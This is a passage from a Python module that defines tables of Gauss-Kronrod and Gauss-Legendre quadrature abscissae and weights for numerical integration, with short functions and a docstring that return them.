[ -0.4058451513773971669066064, 0.1903505780647854099132564],
[ -0.2077849550078984676006894, 0.2044329400752988924141620],
[ 0.0000000000000000000000000, 0.2094821410847278280129992],
[ 0.2077849550078984676006894, 0.2044329400752988924141620],
[ 0.4058451513773971669066064, 0.1903505780647854099132564],
[ 0.5860872354676911302941448, 0.1690047266392679028265834],
[ 0.7415311855993944398638648, 0.1406532597155259187451896],
[ 0.8648644233597690727897128, 0.1047900103222501838398763],
[ 0.9491079123427585245261897, 0.0630920926299785532907007],
[ 0.9914553711208126392068547, 0.0229353220105292249637320]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False], dtype=bool)
},
10: {
'g': np.array(
[[-0.9739065285171717200779640, 0.0666713443086881375935688],
[ -0.8650633666889845107320967, 0.1494513491505805931457763],
[ -0.6794095682990244062343274, 0.2190863625159820439955349],
[ -0.4333953941292471907992659, 0.2692667193099963550912269],
[ -0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.4333953941292471907992659, 0.2692667193099963550912269],
[ 0.6794095682990244062343274, 0.2190863625159820439955349],
[ 0.8650633666889845107320967, 0.1494513491505805931457763],
[ 0.9739065285171717200779640, 0.0666713443086881375935688]],
dtype=float),
'k': np.array(
[[-0.9956571630258080807355273, 0.0116946388673718742780644],
[ -0.9739065285171717200779640, 0.0325581623079647274788190],
[ -0.9301574913557082260012072, 0.0547558965743519960313813],
[ -0.8650633666889845107320967, 0.0750396748109199527670431],
[ -0.7808177265864168970637176, 0.0931254545836976055350655],
[ -0.6794095682990244062343274, 0.1093871588022976418992106],
[ -0.5627571346686046833390001, 0.1234919762620658510779581],
[ -0.4333953941292471907992659, 0.1347092173114733259280540],
[ -0.2943928627014601981311266, 0.1427759385770600807970943],
[ -0.1488743389816312108848260, 0.1477391049013384913748415],
[ 0.0000000000000000000000000, 0.1494455540029169056649365],
[ 0.1488743389816312108848260, 0.1477391049013384913748415],
[ 0.2943928627014601981311266, 0.1427759385770600807970943],
[ 0.4333953941292471907992659, 0.1347092173114733259280540],
[ 0.5627571346686046833390001, 0.1234919762620658510779581],
[ 0.6794095682990244062343274, 0.1093871588022976418992106],
[ 0.7808177265864168970637176, 0.0931254545836976055350655],
[ 0.8650633666889845107320967, 0.0750396748109199527670431],
[ 0.9301574913557082260012072, 0.0547558965743519960313813],
[ 0.9739065285171717200779640, 0.0325581623079647274788190],
[ 0.9956571630258080807355273, 0.0116946388673718742780644]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False], dtype=bool)
},
15: {
'g': np.array(
[[-0.9879925180204854284895657, 0.0307532419961172683546284],
[ -0.9372733924007059043077589, 0.0703660474881081247092674],
[ -0.8482065834104272162006483, 0.1071592204671719350118695],
[ -0.7244177313601700474161861, 0.1395706779261543144478048],
[ -0.5709721726085388475372267, 0.1662692058169939335532009],
[ -0.3941513470775633698972074, 0.1861610000155622110268006],
[ -0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.0000000000000000000000000, 0.2025782419255612728806202],
[ 0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.3941513470775633698972074, 0.1861610000155622110268006],
[ 0.5709721726085388475372267, 0.1662692058169939335532009],
[ 0.7244177313601700474161861, 0.1395706779261543144478048],
[ 0.8482065834104272162006483, 0.1071592204671719350118695],
[ 0.9372733924007059043077589, 0.0703660474881081247092674],
[ 0.9879925180204854284895657, 0.0307532419961172683546284]],
dtype=float),
'k': np.array(
[[-0.9980022986933970602851728, 0.0053774798729233489877921],
[ -0.9879925180204854284895657, 0.0150079473293161225383748],
[ -0.9677390756791391342573480, 0.0254608473267153201868740],
[ -0.9372733924007059043077589, 0.0353463607913758462220379],
[ -0.8972645323440819008825097, 0.0445897513247648766082273],
[ -0.8482065834104272162006483, 0.0534815246909280872653431],
[ -0.7904185014424659329676493, 0.0620095678006706402851392],
[ -0.7244177313601700474161861, 0.0698541213187282587095201],
[ -0.6509967412974169705337359, 0.0768496807577203788944328],
[ -0.5709721726085388475372267, 0.0830805028231330210382892],
[ -0.4850818636402396806936557, 0.0885644430562117706472754],
[ -0.3941513470775633698972074, 0.0931265981708253212254869],
[ -0.2991800071531688121667800, 0.0966427269836236785051799],
[ -0.2011940939974345223006283, 0.0991735987217919593323932],
[ -0.1011420669187174990270742, 0.1007698455238755950449467],
[ 0.0000000000000000000000000, 0.1013300070147915490173748],
[ 0.1011420669187174990270742, 0.1007698455238755950449467],
[ 0.2011940939974345223006283, 0.0991735987217919593323932],
[ 0.2991800071531688121667800, 0.0966427269836236785051799],
[ 0.3941513470775633698972074, 0.0931265981708253212254869],
[ 0.4850818636402396806936557, 0.0885644430562117706472754],
[ 0.5709721726085388475372267, 0.0830805028231330210382892],
[ 0.6509967412974169705337359, 0.0768496807577203788944328],
[ 0.7244177313601700474161861, 0.0698541213187282587095201],
[ 0.7904185014424659329676493, 0.0620095678006706402851392],
[ 0.8482065834104272162006483, 0.0534815246909280872653431],
[ 0.8972645323440819008825097, 0.0445897513247648766082273],
[ 0.9372733924007059043077589, 0.0353463607913758462220379],
[ 0.9677390756791391342573480, 0.0254608473267153201868740],
[ 0.9879925180204854284895657, 0.0150079473293161225383748],
[ 0.9980022986933970602851728, 0.0053774798729233489877921]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False], dtype=bool)
},
20: {
'g': np.array(
[[-0.9931285991850949247861224, 0.0176140071391521183118620],
[ -0.9639719272779137912676661, 0.0406014298003869413310400],
[ -0.9122344282513259058677524, 0.0626720483341090635695065],
[ -0.8391169718222188233945291, 0.0832767415767047487247581],
[ -0.7463319064601507926143051, 0.1019301198172404350367501],
[ -0.6360536807265150254528367, 0.1181945319615184173123774],
[ -0.5108670019508270980043641, 0.1316886384491766268984945],
[ -0.3737060887154195606725482, 0.1420961093183820513292983],
[ -0.2277858511416450780804962, 0.1491729864726037467878287],
[ -0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.2277858511416450780804962, 0.1491729864726037467878287],
[ 0.3737060887154195606725482, 0.1420961093183820513292983],
[ 0.5108670019508270980043641, 0.1316886384491766268984945],
[ 0.6360536807265150254528367, 0.1181945319615184173123774],
[ 0.7463319064601507926143051, 0.1019301198172404350367501],
[ 0.8391169718222188233945291, 0.0832767415767047487247581],
[ 0.9122344282513259058677524, 0.0626720483341090635695065],
[ 0.9639719272779137912676661, 0.0406014298003869413310400],
[ 0.9931285991850949247861224, 0.0176140071391521183118620]],
dtype=float),
'k': np.array(
[[-0.9988590315882776638383156, 0.0030735837185205315012183],
[ -0.9931285991850949247861224, 0.0086002698556429421986618],
[ -0.9815078774502502591933430, 0.0146261692569712529837880],
[ -0.9639719272779137912676661, 0.0203883734612665235980102],
[ -0.9408226338317547535199827, 0.0258821336049511588345051],
[ -0.9122344282513259058677524, 0.0312873067770327989585431],
[ -0.8782768112522819760774430, 0.0366001697582007980305572],
[ -0.8391169718222188233945291, 0.0416688733279736862637883],
[ -0.7950414288375511983506388, 0.0464348218674976747202319],
[ -0.7463319064601507926143051, 0.0509445739237286919327077],
[ -0.6932376563347513848054907, 0.0551951053482859947448324],
[ -0.6360536807265150254528367, 0.0591114008806395723749672],
[ -0.5751404468197103153429460, 0.0626532375547811680258701],
[ -0.5108670019508270980043641, 0.0658345971336184221115636],
[ -0.4435931752387251031999922, 0.0686486729285216193456234],
[ -0.3737060887154195606725482, 0.0710544235534440683057904],
[ -0.3016278681149130043205554, 0.0730306903327866674951894],
[ -0.2277858511416450780804962, 0.0745828754004991889865814],
[ -0.1526054652409226755052202, 0.0757044976845566746595428],
[ -0.0765265211334973337546404, 0.0763778676720807367055028],
[ 0.0000000000000000000000000, 0.0766007119179996564450499],
[ 0.0765265211334973337546404, 0.0763778676720807367055028],
[ 0.1526054652409226755052202, 0.0757044976845566746595428],
[ 0.2277858511416450780804962, 0.0745828754004991889865814],
[ 0.3016278681149130043205554, 0.0730306903327866674951894],
[ 0.3737060887154195606725482, 0.0710544235534440683057904],
[ 0.4435931752387251031999922, 0.0686486729285216193456234],
[ 0.5108670019508270980043641, 0.0658345971336184221115636],
[ 0.5751404468197103153429460, 0.0626532375547811680258701],
[ 0.6360536807265150254528367, 0.0591114008806395723749672],
[ 0.6932376563347513848054907, 0.0551951053482859947448324],
[ 0.7463319064601507926143051, 0.0509445739237286919327077],
[ 0.7950414288375511983506388, 0.0464348218674976747202319],
[ 0.8391169718222188233945291, 0.0416688733279736862637883],
[ 0.8782768112522819760774430, 0.0366001697582007980305572],
[ 0.9122344282513259058677524, 0.0312873067770327989585431],
[ 0.9408226338317547535199827, 0.0258821336049511588345051],
[ 0.9639719272779137912676661, 0.0203883734612665235980102],
[ 0.9815078774502502591933430, 0.0146261692569712529837880],
[ 0.9931285991850949247861224, 0.0086002698556429421986618],
[ 0.9988590315882776638383156, 0.0030735837185205315012183]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False], dtype=bool)
},
25: {
'g': np.array(
[[-0.9955569697904980979087849, 0.0113937985010262879479030],
[ -0.9766639214595175114983154, 0.0263549866150321372619018],
[ -0.9429745712289743394140112, 0.0409391567013063126556235],
[ -0.8949919978782753688510420, 0.0549046959758351919259369],
[ -0.8334426287608340014210211, 0.0680383338123569172071872],
[ -0.7592592630373576305772829, 0.0801407003350010180132350],
[ -0.6735663684734683644851206, 0.0910282619829636498114972],
[ -0.5776629302412229677236898, 0.1005359490670506442022069],
[ -0.4730027314457149605221821, 0.1085196244742636531160940],
[ -0.3611723058093878377358217, 0.1148582591457116483393255],
[ -0.2438668837209884320451904, 0.1194557635357847722281781],
[ -0.1228646926107103963873598, 0.1222424429903100416889595],
[ 0.0000000000000000000000000, 0.1231760537267154512039029],
[ 0.1228646926107103963873598, 0.1222424429903100416889595],
[ 0.2438668837209884320451904, 0.1194557635357847722281781],
[ 0.3611723058093878377358217, 0.1148582591457116483393255],
[ 0.4730027314457149605221821, 0.1085196244742636531160940],
[ 0.5776629302412229677236898, 0.1005359490670506442022069],
[ 0.6735663684734683644851206, 0.0910282619829636498114972],
[ 0.7592592630373576305772829, 0.0801407003350010180132350],
[ 0.8334426287608340014210211, 0.0680383338123569172071872],
[ 0.8949919978782753688510420, 0.0549046959758351919259369],
[ 0.9429745712289743394140112, 0.0409391567013063126556235],
[ 0.9766639214595175114983154, 0.0263549866150321372619018],
[ 0.9955569697904980979087849, 0.0113937985010262879479030]],
dtype=float),
'k': np.array(
[[-0.9992621049926098341934575, 0.0019873838923303159265079],
[ -0.9955569697904980979087849, 0.0055619321353567137580402],
[ -0.9880357945340772476373310, 0.0094739733861741516072077],
[ -0.9766639214595175114983154, 0.0132362291955716748136564],
[ -0.9616149864258425124181300, 0.0168478177091282982315167],
[ -0.9429745712289743394140112, 0.0204353711458828354565683],
[ -0.9207471152817015617463461, 0.0240099456069532162200925],
[ -0.8949919978782753688510420, 0.0274753175878517378029485],
[ -0.8658470652932755954489970, 0.0307923001673874888911090],
[ -0.8334426287608340014210211, 0.0340021302743293378367488],
[ -0.7978737979985000594104109, 0.0371162714834155435603306],
[ -0.7592592630373576305772829, 0.0400838255040323820748393],
[ -0.7177664068130843881866541, 0.0428728450201700494768958],
[ -0.6735663684734683644851206, 0.0455029130499217889098706],
[ -0.6268100990103174127881227, 0.0479825371388367139063923],
[ -0.5776629302412229677236898, 0.0502776790807156719633253],
[ -0.5263252843347191825996238, 0.0523628858064074758643667],
[ -0.4730027314457149605221821, 0.0542511298885454901445434],
[ -0.4178853821930377488518144, 0.0559508112204123173082407],
[ -0.3611723058093878377358217, 0.0574371163615678328535827],
[ -0.3030895389311078301674789, 0.0586896800223942079619742],
[ -0.2438668837209884320451904, 0.0597203403241740599790993],
[ -0.1837189394210488920159699, 0.0605394553760458629453603],
[ -0.1228646926107103963873598, 0.0611285097170530483058590],
[ -0.0615444830056850788865464, 0.0614711898714253166615441],
[ 0.0000000000000000000000000, 0.0615808180678329350787598],
[ 0.0615444830056850788865464, 0.0614711898714253166615441],
[ 0.1228646926107103963873598, 0.0611285097170530483058590],
[ 0.1837189394210488920159699, 0.0605394553760458629453603],
[ 0.2438668837209884320451904, 0.0597203403241740599790993],
[ 0.3030895389311078301674789, 0.0586896800223942079619742],
[ 0.3611723058093878377358217, 0.0574371163615678328535827],
[ 0.4178853821930377488518144, 0.0559508112204123173082407],
[ 0.4730027314457149605221821, 0.0542511298885454901445434],
[ 0.5263252843347191825996238, 0.0523628858064074758643667],
[ 0.5776629302412229677236898, 0.0502776790807156719633253],
[ 0.6268100990103174127881227, 0.0479825371388367139063923],
[ 0.6735663684734683644851206, 0.0455029130499217889098706],
[ 0.7177664068130843881866541, 0.0428728450201700494768958],
[ 0.7592592630373576305772829, 0.0400838255040323820748393],
[ 0.7978737979985000594104109, 0.0371162714834155435603306],
[ 0.8334426287608340014210211, 0.0340021302743293378367488],
[ 0.8658470652932755954489970, 0.0307923001673874888911090],
[ 0.8949919978782753688510420, 0.0274753175878517378029485],
[ 0.9207471152817015617463461, 0.0240099456069532162200925],
[ 0.9429745712289743394140112, 0.0204353711458828354565683],
[ 0.9616149864258425124181300, 0.0168478177091282982315167],
[ 0.9766639214595175114983154, 0.0132362291955716748136564],
[ 0.9880357945340772476373310, 0.0094739733861741516072077],
[ 0.9955569697904980979087849, 0.0055619321353567137580402],
[ 0.9992621049926098341934575, 0.0019873838923303159265079]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False], dtype=bool)
},
30: {
'g': np.array(
[[-0.9968934840746495402716301, 0.0079681924961666056154659],
[ -0.9836681232797472099700326, 0.0184664683110909591423021],
[ -0.9600218649683075122168710, 0.0287847078833233693497192],
[ -0.9262000474292743258793243, 0.0387991925696270495968019],
[ -0.8825605357920526815431165, 0.0484026728305940529029381],
[ -0.8295657623827683974428981, 0.0574931562176190664817217],
[ -0.7677774321048261949179773, 0.0659742298821804951281285],
[ -0.6978504947933157969322924, 0.0737559747377052062682439],
[ -0.6205261829892428611404776, 0.0807558952294202153546949],
[ -0.5366241481420198992641698, 0.0868997872010829798023875],
[ -0.4470337695380891767806099, 0.0921225222377861287176327],
[ -0.3527047255308781134710372, 0.0963687371746442596394686],
[ -0.2546369261678898464398051, 0.0995934205867952670627803],
[ -0.1538699136085835469637947, 0.1017623897484055045964290],
[ -0.0514718425553176958330252, 0.1028526528935588403412856],
[ 0.0514718425553176958330252, 0.1028526528935588403412856],
[ 0.1538699136085835469637947, 0.1017623897484055045964290],
[ 0.2546369261678898464398051, 0.0995934205867952670627803],
[ 0.3527047255308781134710372, 0.0963687371746442596394686],
[ 0.4470337695380891767806099, 0.0921225222377861287176327],
[ 0.5366241481420198992641698, 0.0868997872010829798023875],
[ 0.6205261829892428611404776, 0.0807558952294202153546949],
[ 0.6978504947933157969322924, 0.0737559747377052062682439],
[ 0.7677774321048261949179773, 0.0659742298821804951281285],
[ 0.8295657623827683974428981, 0.0574931562176190664817217],
[ 0.8825605357920526815431165, 0.0484026728305940529029381],
[ 0.9262000474292743258793243, 0.0387991925696270495968019],
[ 0.9600218649683075122168710, 0.0287847078833233693497192],
[ 0.9836681232797472099700326, 0.0184664683110909591423021],
[ 0.9968934840746495402716301, 0.0079681924961666056154659]],
dtype=float),
'k': np.array(
[[-0.9994844100504906375713259, 0.0013890136986770076245516],
[ -0.9968934840746495402716301, 0.0038904611270998840512672],
[ -0.9916309968704045948586284, 0.0066307039159312921733198],
[ -0.9836681232797472099700326, 0.0092732796595177634284411],
[ -0.9731163225011262683746939, 0.0118230152534963417422329],
[ -0.9600218649683075122168710, 0.0143697295070458048124514],
[ -0.9443744447485599794158313, 0.0169208891890532726275723],
[ -0.9262000474292743258793243, 0.0194141411939423811734090],
[ -0.9055733076999077985465226, 0.0218280358216091922971675],
[ -0.8825605357920526815431165, 0.0241911620780806013656864],
[ -0.8572052335460610989586585, 0.0265099548823331016106017],
[ -0.8295657623827683974428981, 0.0287540487650412928439788],
[ -0.7997278358218390830136689, 0.0309072575623877624728843],
[ -0.7677774321048261949179773, 0.0329814470574837260318142],
[ -0.7337900624532268047261711, 0.0349793380280600241374997],
[ -0.6978504947933157969322924, 0.0368823646518212292239111],
[ -0.6600610641266269613700537, 0.0386789456247275929503487],
[ -0.6205261829892428611404776, 0.0403745389515359591119953],
[ -0.5793452358263616917560249, 0.0419698102151642461471475],
[ -0.5366241481420198992641698, 0.0434525397013560693168317],
[ -0.4924804678617785749936931, 0.0448148001331626631923556],
[ -0.4470337695380891767806099, 0.0460592382710069881162717],
[ -0.4004012548303943925354762, 0.0471855465692991539452615],
[ -0.3527047255308781134710372, 0.0481858617570871291407795],
[ -0.3040732022736250773726771, 0.0490554345550297788875282],
[ -0.2546369261678898464398051, 0.0497956834270742063578116],
[ -0.2045251166823098914389577, 0.0504059214027823468408931],
[ -0.1538699136085835469637947, 0.0508817958987496064922975],
[ -0.1028069379667370301470968, 0.0512215478492587721706563],
[ -0.0514718425553176958330252, 0.0514261285374590259338629],
[ 0.0000000000000000000000000, 0.0514947294294515675583404],
[ 0.0514718425553176958330252, 0.0514261285374590259338629],
[ 0.1028069379667370301470968, 0.0512215478492587721706563],
[ 0.1538699136085835469637947, 0.0508817958987496064922975],
[ 0.2045251166823098914389577, 0.0504059214027823468408931],
[ 0.2546369261678898464398051, 0.0497956834270742063578116],
[ 0.3040732022736250773726771, 0.0490554345550297788875282],
[ 0.3527047255308781134710372, 0.0481858617570871291407795],
[ 0.4004012548303943925354762, 0.0471855465692991539452615],
[ 0.4470337695380891767806099, 0.0460592382710069881162717],
[ 0.4924804678617785749936931, 0.0448148001331626631923556],
[ 0.5366241481420198992641698, 0.0434525397013560693168317],
[ 0.5793452358263616917560249, 0.0419698102151642461471475],
[ 0.6205261829892428611404776, 0.0403745389515359591119953],
[ 0.6600610641266269613700537, 0.0386789456247275929503487],
[ 0.6978504947933157969322924, 0.0368823646518212292239111],
[ 0.7337900624532268047261711, 0.0349793380280600241374997],
[ 0.7677774321048261949179773, 0.0329814470574837260318142],
[ 0.7997278358218390830136689, 0.0309072575623877624728843],
[ 0.8295657623827683974428981, 0.0287540487650412928439788],
[ 0.8572052335460610989586585, 0.0265099548823331016106017],
[ 0.8825605357920526815431165, 0.0241911620780806013656864],
[ 0.9055733076999077985465226, 0.0218280358216091922971675],
[ 0.9262000474292743258793243, 0.0194141411939423811734090],
[ 0.9443744447485599794158313, 0.0169208891890532726275723],
[ 0.9600218649683075122168710, 0.0143697295070458048124514],
[ 0.9731163225011262683746939, 0.0118230152534963417422329],
[ 0.9836681232797472099700326, 0.0092732796595177634284411],
[ 0.9916309968704045948586284, 0.0066307039159312921733198],
[ 0.9968934840746495402716301, 0.0038904611270998840512672],
[ 0.9994844100504906375713259, 0.0013890136986770076245516]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False], dtype=bool)
},
}
w = weights[n]
    dup = w['dup']
    xi = w['k'][:, 0]
    wi1 = np.zeros_like(xi)
    wi1[dup] = w['g'][:, 1]
    wi2 = w['k'][:, 1]
return xi, wi1, wi2
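# Illustrative self-check (added sketch, not part of the original module).
# For any supported n, the Kronrod weights wi2 and the zero-padded Gauss
# weights wi1 each integrate constants exactly on [-1, 1], so both sum to 2:
#
#     xi, wi1, wi2 = gauss_kronrod_abscissae_and_weights(10)
#     assert np.isclose(wi1.sum(), 2.0)  # embedded n-point Gauss rule
#     assert np.isclose(wi2.sum(), 2.0)  # (2n+1)-point Kronrod rule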
def gauss_legendre_abscissae_and_weights(n):
"""Gauss-Legendre quadrature abscissae and weights
Integral = Sum(f(xi) * wi)
Parameters
----------
n : [2-20, 32, 64, 100]
Number of integration points
Returns
-------
xi, wi : 1d array of len(n)
        Abscissae and weights for numerical integration
References
----------
.. [1] Holoborodko, Pavel. 2014. 'Numerical Integration'. Accessed
April 24.
http://www.holoborodko.com/pavel/numerical-methods/numerical-integration/.
"""
if n not in [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
32, 64, 100]:
raise ValueError('n must be 2-20, 32, 64, or 100')
weights = {
2: np.array(
[[-0.5773502691896257645091488, 1.0000000000000000000000000],
[ 0.5773502691896257645091488, 1.0000000000000000000000000]],
dtype=float),
3: np.array(
[[-0.7745966692414833770358531, 0.5555555555555555555555556],
[ 0, 0.8888888888888888888888889],
[ 0.7745966692414833770358531, 0.5555555555555555555555556]],
dtype=float),
4: np.array(
[[-0.8611363115940525752239465, 0.3478548451374538573730639],
[ -0.3399810435848562648026658, 0.6521451548625461426269361],
[ 0.3399810435848562648026658, 0.6521451548625461426269361],
[ 0.8611363115940525752239465, 0.3478548451374538573730639]],
dtype=float),
5: np.array(
[[-0.9061798459386639927976269, 0.2369268850561890875142640],
[ -0.5384693101056830910363144, 0.4786286704993664680412915],
[ 0, 0.5688888888888888888888889],
[ 0.5384693101056830910363144, 0.4786286704993664680412915],
[ 0.9061798459386639927976269, 0.2369268850561890875142640]],
dtype=float),
6: np.array(
[[-0.9324695142031520278123016, 0.1713244923791703450402961],
[ -0.6612093864662645136613996, 0.3607615730481386075698335],
[ -0.2386191860831969086305017, 0.4679139345726910473898703],
[ 0.2386191860831969086305017, 0.4679139345726910473898703],
[ 0.6612093864662645136613996, 0.3607615730481386075698335],
[ 0.9324695142031520278123016, 0.1713244923791703450402961]],
dtype=float),
7: np.array(
[[-0.9491079123427585245261897, 0.1294849661688696932706114],
[ -0.7415311855993944398638648, 0.2797053914892766679014678],
[ -0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0, 0.4179591836734693877551020],
[ 0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.7415311855993944398638648, 0.2797053914892766679014678],
[ 0.9491079123427585245261897, 0.1294849661688696932706114]],
dtype=float),
8: np.array(
[[-0.9602898564975362316835609, 0.1012285362903762591525314],
[ -0.7966664774136267395915539, 0.2223810344533744705443560],
[ -0.5255324099163289858177390, 0.3137066458778872873379622],
[ -0.1834346424956498049394761, 0.3626837833783619829651504],
[ 0.1834346424956498049394761, 0.3626837833783619829651504],
[ 0.5255324099163289858177390, 0.3137066458778872873379622],
[ 0.7966664774136267395915539, 0.2223810344533744705443560],
[ 0.9602898564975362316835609, 0.1012285362903762591525314]],
dtype=float),
9: np.array(
[[-0.9681602395076260898355762, 0.0812743883615744119718922],
[ -0.8360311073266357942994298, 0.1806481606948574040584720],
[ -0.6133714327005903973087020, 0.2606106964029354623187429],
[ -0.3242534234038089290385380, 0.3123470770400028400686304],
[ 0, 0.3302393550012597631645251],
[ 0.3242534234038089290385380, 0.3123470770400028400686304],
[ 0.6133714327005903973087020, 0.2606106964029354623187429],
[ 0.8360311073266357942994298, 0.1806481606948574040584720],
[ 0.9681602395076260898355762, 0.0812743883615744119718922]],
dtype=float),
10: np.array(
[[-0.9739065285171717200779640, 0.0666713443086881375935688],
[ -0.8650633666889845107320967, 0.1494513491505805931457763],
[ -0.6794095682990244062343274, 0.2190863625159820439955349],
[ -0.4333953941292471907992659, 0.2692667193099963550912269],
[ -0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.4333953941292471907992659, 0.2692667193099963550912269],
[ 0.6794095682990244062343274, 0.2190863625159820439955349],
[ 0.8650633666889845107320967, 0.1494513491505805931457763],
[ 0.9739065285171717200779640, 0.0666713443086881375935688]],
dtype=float),
11: np.array(
[[-0.9782286581460569928039380, 0.0556685671161736664827537],
[ -0.8870625997680952990751578, 0.1255803694649046246346943],
[ -0.7301520055740493240934163, 0.1862902109277342514260976],
[ -0.5190961292068118159257257, 0.2331937645919904799185237],
[ -0.2695431559523449723315320, 0.2628045445102466621806889],
[ 0, 0.2729250867779006307144835],
[ 0.2695431559523449723315320, 0.2628045445102466621806889],
[ 0.5190961292068118159257257, 0.2331937645919904799185237],
[ 0.7301520055740493240934163, 0.1862902109277342514260976],
[ 0.8870625997680952990751578, 0.1255803694649046246346943],
[ 0.9782286581460569928039380, 0.0556685671161736664827537]],
dtype=float),
12: np.array(
[[-0.9815606342467192506905491, 0.0471753363865118271946160],
[ -0.9041172563704748566784659, 0.1069393259953184309602547],
[ -0.7699026741943046870368938, 0.1600783285433462263346525],
[ -0.5873179542866174472967024, 0.2031674267230659217490645],
[ -0.3678314989981801937526915, 0.2334925365383548087608499],
[ -0.1252334085114689154724414, 0.2491470458134027850005624],
[ 0.1252334085114689154724414, 0.2491470458134027850005624],
[ 0.3678314989981801937526915, 0.2334925365383548087608499],
[ 0.5873179542866174472967024, 0.2031674267230659217490645],
[ 0.7699026741943046870368938, 0.1600783285433462263346525],
[ 0.9041172563704748566784659, 0.1069393259953184309602547],
[ 0.9815606342467192506905491, 0.0471753363865118271946160]],
dtype=float),
13: np.array(
[[-0.9841830547185881494728294, 0.0404840047653158795200216],
[ -0.9175983992229779652065478, 0.0921214998377284479144218],
[ -0.8015780907333099127942065, 0.1388735102197872384636018],
[ -0.6423493394403402206439846, 0.1781459807619457382800467],
[ -0.4484927510364468528779129, 0.2078160475368885023125232],
[ -0.2304583159551347940655281, 0.2262831802628972384120902],
[ 0, 0.2325515532308739101945895],
[ 0.2304583159551347940655281, 0.2262831802628972384120902],
[ 0.4484927510364468528779129, 0.2078160475368885023125232],
[ 0.6423493394403402206439846, 0.1781459807619457382800467],
[ 0.8015780907333099127942065, 0.1388735102197872384636018],
[ 0.9175983992229779652065478, 0.0921214998377284479144218],
[ 0.9841830547185881494728294, 0.0404840047653158795200216]],
dtype=float),
14: np.array(
[[-0.9862838086968123388415973, 0.0351194603317518630318329],
[ -0.9284348836635735173363911, 0.0801580871597602098056333],
[ -0.8272013150697649931897947, 0.1215185706879031846894148],
[ -0.6872929048116854701480198, 0.1572031671581935345696019],
[ -0.5152486363581540919652907, 0.1855383974779378137417166],
[ -0.3191123689278897604356718, 0.2051984637212956039659241],
[ -0.1080549487073436620662447, 0.2152638534631577901958764],
[ 0.1080549487073436620662447, 0.2152638534631577901958764],
[ 0.3191123689278897604356718, 0.2051984637212956039659241],
[ 0.5152486363581540919652907, 0.1855383974779378137417166],
[ 0.6872929048116854701480198, 0.1572031671581935345696019],
[ 0.8272013150697649931897947, 0.1215185706879031846894148],
[ 0.9284348836635735173363911, 0.0801580871597602098056333],
[ 0.9862838086968123388415973, 0.0351194603317518630318329]],
dtype=float),
15: np.array(
[[-0.9879925180204854284895657, 0.0307532419961172683546284],
[ -0.9372733924007059043077589, 0.0703660474881081247092674],
[ -0.8482065834104272162006483, 0.1071592204671719350118695],
[ -0.7244177313601700474161861, 0.1395706779261543144478048],
[ -0.5709721726085388475372267, 0.1662692058169939335532009],
[ -0.3941513470775633698972074, 0.1861610000155622110268006],
[ -0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0, 0.2025782419255612728806202],
[ 0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.3941513470775633698972074, 0.1861610000155622110268006],
[ 0.5709721726085388475372267, 0.1662692058169939335532009],
[ 0.7244177313601700474161861, 0.1395706779261543144478048],
[ 0.8482065834104272162006483, 0.1071592204671719350118695],
[ 0.9372733924007059043077589, 0.0703660474881081247092674],
[ 0.9879925180204854284895657, 0.0307532419961172683546284]],
dtype=float),
16: np.array(
[[-0.9894009349916499325961542, 0.0271524594117540948517806],
[ -0.9445750230732325760779884, 0.0622535239386478928628438],
[ -0.8656312023878317438804679, 0.0951585116824927848099251],
[ -0.7554044083550030338951012, 0.1246289712555338720524763],
[ -0.6178762444026437484466718, 0.1495959888165767320815017],
[ -0.4580167776572273863424194, 0.1691565193950025381893121],
[ -0.2816035507792589132304605, 0.1826034150449235888667637],
[ -0.0950125098376374401853193, 0.1894506104550684962853967],
[ 0.0950125098376374401853193, 0.1894506104550684962853967],
[ 0.2816035507792589132304605, 0.1826034150449235888667637],
[ 0.4580167776572273863424194, 0.1691565193950025381893121],
[ 0.6178762444026437484466718, 0.1495959888165767320815017],
[ 0.7554044083550030338951012, 0.1246289712555338720524763],
[ 0.8656312023878317438804679, 0.0951585116824927848099251],
[ 0.9445750230732325760779884, 0.0622535239386478928628438],
[ 0.9894009349916499325961542, 0.0271524594117540948517806]],
dtype=float),
17: np.array(
[[-0.9905754753144173356754340, 0.0241483028685479319601100],
[ -0.9506755217687677612227170, 0.0554595293739872011294402],
[ -0.8802391537269859021229557, 0.0850361483171791808835354],
[ -0.7815140038968014069252301, 0.1118838471934039710947884],
[ -0.6576711592166907658503022, 0.1351363684685254732863200],
[ -0.5126905370864769678862466, 0.1540457610768102880814316],
[ -0.3512317634538763152971855, 0.1680041021564500445099707],
[ -0.1784841814958478558506775, 0.1765627053669926463252710],
[ 0, 0.1794464703562065254582656],
[ 0.1784841814958478558506775, 0.1765627053669926463252710],
[ 0.3512317634538763152971855, 0.1680041021564500445099707],
[ 0.5126905370864769678862466, 0.1540457610768102880814316],
[ 0.6576711592166907658503022, 0.1351363684685254732863200],
[ 0.7815140038968014069252301, 0.1118838471934039710947884],
